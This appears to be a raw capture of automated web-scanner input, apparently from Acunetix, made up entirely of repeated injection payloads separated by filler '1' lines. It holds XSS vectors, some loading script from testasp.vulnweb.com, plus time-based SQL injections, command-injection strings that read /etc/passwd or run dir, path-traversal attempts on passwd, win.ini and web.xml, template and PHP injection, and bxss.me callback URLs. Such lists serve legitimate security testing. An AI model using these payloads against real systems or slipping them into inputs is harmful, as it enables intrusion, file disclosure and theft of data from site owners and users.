
1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?930384></ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(949769)</ScRiPt>

1

1

1

response.write(9750270*9046571)

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1

1<video><source onerror="javascript:prompt(903179)">

WEB-INF/web.xml

'&cat /etc/passwd&'

1

'+response.write(9750270*9046571)+'

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(960150)"></g></svg>

1

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9750270*9046571)+"

1

cat /etc/passwd

../../../../../../../../../../etc/passwd

1

1<div style=width:expression(prompt(901898))>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

`cat /etc/passwd`

1

1

1

1

1<iframe src='data:text/html

1

-1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1

1

1

1

'|'ld

../../../../../../../../../../etc/passwd.jpg

-1)

1

1<body onload=prompt(980390)>

1

1

${99670+99437}

1

1

"|"ld

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(973562)>

-1))

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1&n924396=v918340

)

1

1

1some_inexistent_file_with_long_name%00.jpg

TWEifTdU'

1<img src=xyz OnErRor=prompt(922014)>

!(()&&!|*|*|

'

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img/src=">" onerror=alert(958529)>

mWlVcMLd')

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

^(#$!@#$)(()))******

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

5gL4gvna'))

'

1<ScRiPt%20>prompt(989339)</sCripT>

1

1

testasp.vulnweb.com

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1&lt

"

-1

||cat /etc/passwd

1

1

1

/etc/passwd

1

1

\xf6<img acu onmouseover=prompt(928638) //\xf6>

${@print(md5(acunetix_wvs_security_test))}

1

1

&dir

-1)

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

1<input autofocus onfocus=prompt(927422)>

http://hitD1yzvTIw5U.bxss.me/

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1))

'&dir&'

comments

1

1

1

gOSBRRBY'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

1

1

1

comments

"&dir&"

yaUT1GyO')

1

[url=http://www.acunetix.com]website security[/url]

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

|dir

UIYhEFlI'))

comments/.

http://www.acunetix.tst

1

1

'"

1

1_lcUZZ <ScRiPt >prompt(906576)</ScRiPt>

1

1

1

1

'|dir

1'"()&%<ScRiPt >prompt(977914)</ScRiPt>

1

1

file:///etc/passwd

<!--

'"()&%<ScRiPt >prompt(970717)</ScRiPt>

"|dir

1

1

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1_961760

1

WEB-INF/web.xml

1

1

1

1

1

1

1

acu7481\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7481

WEB-INF\web.xml

1

1

1

1

acux9545\xc0\xbez1\xc0\xbcz2a\x90bcxuca9545

1

../../../../../../../../../../windows/win.ini

1

1

1<ScRiPt >prompt(980558)</ScRiPt>

1

1

1

../../../../../../../../../../boot.ini

1<script>prompt(997748)</script>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(950400)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?914506></ScRiPt>

1

................windowswin.ini

1<ScRiPt >prompt(990501)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<video><source onerror="javascript:prompt(909061)">

1

response.write(9640583*9345491)

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(918877)"></g></svg>

1

1

1

'+response.write(9640583*9345491)+'

1

1<div style=width:expression(prompt(961464))>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

&cat /etc/passwd&

1

../../../../../../../../../../etc/passwd

"+response.write(9640583*9345491)+"

SomeCustomInjectedHeader:injected_by_wvs

1

1

'&cat /etc/passwd&'

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<iframe src='data:text/html

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(974583)>

1

1

../../../../../../../../../../etc/passwd.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

cat /etc/passwd

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

WEB-INF/web.xml

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(926033)>

1

`cat /etc/passwd`

-1

1

1<img src=xyz OnErRor=prompt(956212)>

1

WEB-INF\web.xml

${99762+99829}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img/src=">" onerror=alert(933013)>

-1)

|cat /etc/passwd#

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1some_inexistent_file_with_long_name%00.jpg

1

1<ScRiPt%20>prompt(931052)</sCripT>

1

'|'ld

-1))

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1&lt

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1&n947469=v946632

)

/etc/passwd

PcOkCIbB'

"|"ld

1

'"()

1

testasp.vulnweb.com

\xf6<img acu onmouseover=prompt(926712) //\xf6>

!(()&&!|*|*|

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

hpq9vzRM')

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(960542)>

1

1

MRU3Aa74'))

1

'

1

<a href='http://www.acunetix.com'>website security</a>

1

"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

"

http://hittiS2bgoCwH.bxss.me/

-1

1

1

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}

1

1

||cat /etc/passwd

1

-1)

1

1_plmMU <ScRiPt >prompt(906588)</ScRiPt>

acunetix_wvs_invalid_filename

file:///etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

&dir

1

1

-1))

comments

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

/\../\../\../\../\../\../\../etc/passwd

1

cugiMSCD'

http://www.acunetix.tst

'&dir&'

1

comments

1

1

1

1

"&dir&"

comments/.

1

1

DqJZj15Z')

WEB-INF/web.xml

|dir

1'"()&%<ScRiPt >prompt(919781)</ScRiPt>

'"

1

1

WEB-INF\web.xml

i7qJNfCd'))

1

1

'|dir

1

<!--

'"()&%<ScRiPt >prompt(944940)</ScRiPt>

../../../../../../../../../../windows/win.ini

"|dir

1

1

1

1_919759

../../../../../../../../../../boot.ini

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acu4252\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4252

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acux9919\xc0\xbez1\xc0\xbcz2a\x90bcxuca9919

1

1

................windowswin.ini

1

1

1<ScRiPt >prompt(902669)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(956461)</script>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(975825)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?901718></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt >prompt(965294)</ScRiPt>

1

1

1

WEB-INF/web.xml

1

1<video><source onerror="javascript:prompt(945242)">

1

1

WEB-INF\web.xml

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(944141)"></g></svg>

1

1

1

response.write(9593054*9334837)

1

1<div style=width:expression(prompt(925804))>

1

&cat /etc/passwd&

'+response.write(9593054*9334837)+'

1

1

'&cat /etc/passwd&'

1<iframe src='data:text/html

1

1

1

"+response.write(9593054*9334837)+"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

../../../../../../../../../../etc/passwd

1

1<body onload=prompt(903380)>

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(900189)>

-1

`cat /etc/passwd`

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

-1)

1<img src=xyz OnErRor=prompt(984000)>

1

|cat /etc/passwd#

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

${99823+99588}

-1))

'|'ld

1

1<img/src=">" onerror=alert(924542)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

3kwgDYnt'

1

1

1&n908127=v980626

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"|"ld

zLPgkoR6')

1some_inexistent_file_with_long_name%00.jpg

1<ScRiPt%20>prompt(967253)</sCripT>

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

6yyGysgx'))

'

1&lt

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

'"()

"

1

1

\xf6<img acu onmouseover=prompt(999230) //\xf6>

'

1

-1)

1

||cat /etc/passwd

^(#$!@#$)(()))******

/etc/passwd

1

1

-1))

"

1

1<input autofocus onfocus=prompt(943469)>

1

oaZXInv9'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

&dir

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}

<a href='http://www.acunetix.com'>website security</a>

http://hitSgkaWOWEqa.bxss.me/

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

HeRQr07x')

${@print(md5(acunetix_wvs_security_test))}\

'&dir&'

comments

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

9cQsg0gt'))

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

1

comments

"&dir&"

1

1

1_zcj8O <ScRiPt >prompt(971488)</ScRiPt>

1

1

file:///etc/passwd

|dir

1

comments/.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

'|dir

1

'"

1

1

WEB-INF/web.xml

1

1

1'"()&%<ScRiPt >prompt(918875)</ScRiPt>

1

1

"|dir

<!--

1

1

WEB-INF\web.xml

'"()&%<ScRiPt >prompt(968279)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

1_933174

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acu1441\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1441

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

acux10746\xc0\xbez1\xc0\xbcz2a\x90bcxuca10746

................windowswin.ini

1

1<ScRiPt >prompt(983442)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<script>prompt(959987)</script>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(969369)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?904259></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(910715)</ScRiPt>

1

1

1

1

1<video><source onerror="javascript:prompt(942779)">

response.write(9778962*9746126)

WEB-INF/web.xml

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(980154)"></g></svg>

'+response.write(9778962*9746126)+'

WEB-INF\web.xml

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

../../../../../../../../../../etc/passwd

1<div style=width:expression(prompt(998726))>

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

"+response.write(9778962*9746126)+"

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1

"&cat /etc/passwd&"

1

-1

../../../../../../../../../../etc/passwd.jpg

1

1<body onload=prompt(989672)>

1

1

cat /etc/passwd

${100067+99853}

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1)

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(952244)>

1

1

1

`cat /etc/passwd`

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

)

1&n991210=v906826

1

1<img src=xyz OnErRor=prompt(945626)>

1some_inexistent_file_with_long_name%00.jpg

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

99q0Kv1N'

'|'ld

!(()&&!|*|*|

1<img/src=">" onerror=alert(989202)>

1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

^(#$!@#$)(()))******

J0p9wRWf')

"|"ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<ScRiPt%20>prompt(901774)</sCripT>

testasp.vulnweb.com

1

1

'"()

1

/etc/passwd

1&lt

KH418Gdr'))

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1

'

1

\xf6<img acu onmouseover=prompt(917797) //\xf6>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

1

1

-1)

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

"

1<input autofocus onfocus=prompt(968306)>

${@print(md5(acunetix_wvs_security_test))}

1

1

-1))

http://hitvr1o44LyKp.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}\

||cat /etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

1

acunetix_wvs_invalid_filename

1

1

S6vAaqAE'

1

file:///etc/passwd

[url=http://www.acunetix.com]website security[/url]

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

zyAsWvMC')

1

http://www.acunetix.tst

/\../\../\../\../\../\../\../etc/passwd

'"

1

1

comments

1_dvJfD <ScRiPt >prompt(976465)</ScRiPt>

'&dir&'

<!--

1

WEB-INF/web.xml

duFUCBX2'))

1

"&dir&"

comments/.

1'"()&%<ScRiPt >prompt(975619)</ScRiPt>

1

1

1

1

1

WEB-INF\web.xml

|dir

1

'"()&%<ScRiPt >prompt(925147)</ScRiPt>

1

1

1

../../../../../../../../../../windows/win.ini

'|dir

1

1

1_962297

1

1

1

../../../../../../../../../../boot.ini

"|dir

1

1

acu5436\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5436

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acux2047\xc0\xbez1\xc0\xbcz2a\x90bcxuca2047

1

1

1

1<ScRiPt >prompt(987329)</ScRiPt>

................windowswin.ini

1

1

1

1<script>prompt(981813)</script>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(952627)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?908115></ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(995791)</ScRiPt>

1

1

1

1

1<video><source onerror="javascript:prompt(963121)">

1

1

WEB-INF/web.xml

response.write(9849938*9642435)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(981149)"></g></svg>

1

WEB-INF\web.xml

1

1

1<div style=width:expression(prompt(940403))>

1

'+response.write(9849938*9642435)+'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<iframe src='data:text/html

&cat /etc/passwd&

1

"+response.write(9849938*9642435)+"

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1<body onload=prompt(938986)>

1

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

"&cat /etc/passwd&"

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(943864)>

${99747+99177}

1

1

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

cat /etc/passwd

-1

1

1

1

1<img src=xyz OnErRor=prompt(965142)>

1

`cat /etc/passwd`

-1)

1some_inexistent_file_with_long_name%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

)

1&n912202=v990119

1<img/src=">" onerror=alert(948637)>

|cat /etc/passwd#

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1

'|'ld

1

1<ScRiPt%20>prompt(987400)</sCripT>

!(()&&!|*|*|

testasp.vulnweb.com

1

H4Ule98E'

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

"|"ld

'"()

^(#$!@#$)(()))******

1&lt

1

qZxNoNos')

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

\xf6<img acu onmouseover=prompt(902181) //\xf6>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

YrKphJ1t'))

1

1

1

1

'

/etc/passwd

1<input autofocus onfocus=prompt(922473)>

1

1

"

-1

1

1

<a href='http://www.acunetix.com'>website security</a>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

acunetix_wvs_invalid_filename

1

-1)

http://hit0m4143EDPp.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

[url=http://www.acunetix.com]website security[/url]

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

||cat /etc/passwd

comments

-1))

1

${@print(md5(acunetix_wvs_security_test))}\

1_D2Ibe <ScRiPt >prompt(987082)</ScRiPt>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

vPhTav4p'

comments

&dir

1

1

1

'"

1

http://www.acunetix.tst

nMVSwxPu')

comments/.

1'"()&%<ScRiPt >prompt(934881)</ScRiPt>

1

1

'&dir&'

<!--

1

1

1

LKLgL6Ee'))

'"()&%<ScRiPt >prompt(926784)</ScRiPt>

1

"&dir&"

1

1

1

file:///etc/passwd

1

1_916007

1

|dir

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

'|dir

1

1

1

WEB-INF/web.xml

1

"|dir

acu1968\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1968

WEB-INF\web.xml

1

1

1

acux8137\xc0\xbez1\xc0\xbcz2a\x90bcxuca8137

1

1

1

../../../../../../../../../../windows/win.ini

1<ScRiPt >prompt(918715)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1

1

1<script>prompt(939234)</script>

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(986788)</ScRiPt>

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?976454></ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

1

1<ScRiPt >prompt(984191)</ScRiPt>

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(985855)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(929713)"></g></svg>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<div style=width:expression(prompt(933008))>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9983030*9673908)

1

1<iframe src='data:text/html

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

'+response.write(9983030*9673908)+'

&cat /etc/passwd&

1

1<body onload=prompt(993361)>

'&cat /etc/passwd&'

"+response.write(9983030*9673908)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(920054)>

1

../../../../../../../../../../etc/passwd

WEB-INF/web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1<img src=xyz OnErRor=prompt(930193)>

WEB-INF\web.xml

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1<img/src=">" onerror=alert(994448)>

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

${100394+100278}

../../../../../../../../../../etc/passwd.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

`cat /etc/passwd`

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<ScRiPt%20>prompt(950685)</sCripT>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

1

1

1

1&lt

1

1&n909023=v914631

1some_inexistent_file_with_long_name%00.jpg

|cat /etc/passwd#

\xf6<img acu onmouseover=prompt(911742) //\xf6>

)

-1)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

1<input autofocus onfocus=prompt(921073)>

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

-1))

1

"|"ld

^(#$!@#$)(()))******

<a href='http://www.acunetix.com'>website security</a>

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

By3fx5XD'

1

1

/etc/passwd

[url=http://www.acunetix.com]website security[/url]

'

'"()

1

'

1

1

7oaxLUQc')

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

"

1

1_2MOn5 <ScRiPt >prompt(970995)</ScRiPt>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

l3IrWuBu'))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

||cat /etc/passwd

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}

-1

1

http://hit1Z4MXmVgds.bxss.me/

&dir

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1)

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

'&dir&'

1

acunetix_wvs_invalid_filename

1

-1))

1

"&dir&"

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

file:///etc/passwd

'"

gpCnOIX1'

comments

1

1

|dir

<!--

1'"()&%<ScRiPt >prompt(941692)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

'|dir

comments

1

uSjV8pfK')

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(902343)</ScRiPt>

"|dir

comments/.

1

DRksQVsT'))

1

1

1

1

1

1_949707

WEB-INF\web.xml

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

1

acu7477\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7477

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

acux4344\xc0\xbez1\xc0\xbcz2a\x90bcxuca4344

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(996991)</ScRiPt>

